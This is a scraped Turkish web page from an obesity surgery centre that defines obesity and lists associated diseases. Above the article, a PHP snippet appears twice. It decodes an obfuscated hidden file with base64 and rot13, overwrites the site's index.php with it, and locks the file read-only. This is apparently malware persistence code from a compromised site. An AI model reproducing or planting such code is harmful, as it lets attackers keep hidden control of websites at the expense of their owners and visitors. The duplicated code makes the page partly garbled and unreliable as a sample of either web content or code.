$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Obezite'nin Tanımı - İstanbul Obezite Cerrahisi Merkezi

Skip links

Obezite’nin Tanımı

Obezite, en basit şekilde,  vücutta sağlığı bozacak ölçüde aşırı yağ birikmesi olarak tanımlanabilir. Diğer bir tanımlamayla yetişkin kadınlarda vücut ağırlığının ortalama %30 ‘dan fazla, erkeklerde de % 25’ten fazla yağ olmasıdır. Kas yapısı gelişmiş insanlar hariç, standart boy- kilo ölçüsünün % 20 üzerine çıkıldığı durumdur. Obezite-Aşırı şişmanlık metabolik, biyokimyasal, fizyolojik, psikolojik, genetik ve çevresel faktörlerin rol oynadığı bir hastalıktır. 

Geçmişte obezite iştah çekici gıda maddelerinin gereğinden fazla tüketilmesi sonucu ortaya çıkan bir durum olarak niteleniyordu. Bilimsel araştırmalar ise obezitenin karmaşık bir olgu olduğunu, insanın biyolojik yapısından kaynaklanan bir hastalık olduğunu göstermektedir. Obezitenin çok çeşitli nedenlerden kaynaklandığı ve farklı tipleri olduğu bilinmektedir.

Sadece obeziteden kurtularak bu hastalıklarla da savaşabilirsiniz:

– Tip 2 diyabet – Beyin kanaması ve Felç
– Koroner arter hastalığı – Safra kesesi taşı
– Hipertansiyon – Meme,kalınbarsak ve prostat gibi bazı kanserler
– Kalp yetmezliği – İdrar inkontinansı
– Uyku apnesi – Uyku bozuklukları
– Solunum bozuklukları – Doğum zorlukları
– Gastroözofageal reflü – Polikistik over sendromu
– Depresyon – Aşırı kıllanma
– Kısırlık – Toplumsal uyumsuzluk
– Adet düzensizlikleri – Metabolik sendromu
– Osteoartrit – İnsulin direnci
– Varis – Kolesterol ve lipid yüksekliği
Bitnami